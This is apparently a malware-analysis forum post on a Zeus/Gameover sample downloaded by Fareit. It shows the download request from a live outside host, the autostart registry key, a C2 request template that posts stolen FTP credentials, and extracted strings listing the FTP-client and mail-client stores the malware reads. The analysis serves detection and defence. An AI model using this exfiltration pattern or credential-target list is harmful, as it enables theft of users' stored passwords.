This Zeus/gameover was downloading from Fareit I reported
HERE.
VT detection ratio is too low (3/46)
https://www.virustotal.com/en/file/6335 ... 375438407/
The sample was downloaded from this remote host:
Code: Select allGET /hc53.exe HTTP/1.1
Accept: */*
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: esmallboxes.com
Connection: Close
:
HTTP/1.1 200 OK
Content-Length: 199168
Content-Type: application/octet-stream
Last-Modified: Thu, 01 Aug 2013 16:34:50 GMT
Accept-Ranges: bytes
ETag: "7a4646bd58ece1:428ef"
Server: Microsoft-IIS/6.0
X-Powered-By-Plesk: PleskWin
X-Powered-By: ASP.NET
Date: Fri, 02 Aug 2013 08:35:10 GMT
Connection: close
AutoStart path:
Code: Select allSoftware\Microsoft\Windows\CurrentVersion\Run
Poking remote host with HTTP/1.1 with below User-Agent & headers
Code: Select allGET HTTP/1.1
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
X-Real-IP:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
gzip
5629186B-0207-4659-AE5D-B09282932A86
Using POST Method for posting ftp credentials of infected PC:
Code: Select allHTTP/1.1
Mozilla/5.0 (Windows; U; Windows NT 5.1)
index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ftp_host=%s&ftp_login=%s&ftp_pass=%s
Transfer-Encoding: chunked
Content-Length:
Content-Encoding: gzip
This is the FTP credentials aimed:
Code: Select allSoftware\VanDyke\SecureFX
Config Path
\Sessions
DataFolder
Software\FTPRush
RushSite.xml
Software\UltraFXP
Sites.xml
Estsoft\ALFTP\ESTdb2.dat
Software\Microsoft\Windows\CurrentVersion\Uninstall
FTP Commander
FTP Navigator
InstallLocation
UninstallString
%s\TurboFTP\addrbk.dat
%s:%s:%s:%s
%s:%s:%s:%s:%d
%s\SmartFTP\Client 2.0\Favorites
%s\*.xml
<Host>
<Host>
</Host>
<Port>
<Port>
</Port>
<User>
<User>
</User>
<Password>
<Password>
</Password>
%s:%s:%s:%s
%s:%s:%s:%s:%s
ixKZ-<
host
uid
pwd
software\ipswitch\ws_ftp
DataDir
%s\sites\ws_ftp.ini
connections
host
username
password
anonymous
e-mail
general
GHISLER
FtpIniName
Install_Dir
InstallDir
pstorec.dll
crypt32.dll
PStoreCreateInstance
CryptUnprotectData
FileZilla\FileZilla.xml
FileZilla\RecentServers.xml
FileZilla\SiteManager.xml
Server
Site
Install_Dir
FileZilla.xml
Last Server Pass
Last Server User
Last Server Host
\QCToolbar
QCHistory
\GlobalSCAPE
HostName
User
Password
software\far\plugins\ftp\hosts
software\far2\plugins\ftp\hosts
Username
Hostname
Password
User
Host
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
USER
HOST
PASS
E+ts
UID
URL
Encrypt_PW
User
Server
Password
Ftplist.txt
Password
HostName
Username
Software\CoffeeCup Software\Internet\Profiles
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
q9IN
%AppData%\..\Local\VirtualStore\Program Files\Total Commander
wcx_ftp.ini
Software\Ghisler
WininetCacheCredentials
DPAPI:
internet explorer
MS IE FTP Passwords
Run in Secure Mode
%AppData%\..\Local\VirtualStore\Program Files\FileZilla
FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\FileZilla
Software\FileZilla\Site Manager
User
Host
Pass
%s:%s:%s:%s
\*.ini
\Software\GlobalSCAPE\
Checked mail softwares..
Code: Select allSoftware\Microsoft\WAB\DLLPath
Microsoft Outlook
SOFTWARE\Clients\Mail
SOFTWARE\Clients\Mail\Microsoft Outlook
Open WAB/Outlook Express to get IDs..
Code: Select allWABOpen
Identities
Microsoft\Outlook Express
*.dbx
MSWQ*.tmp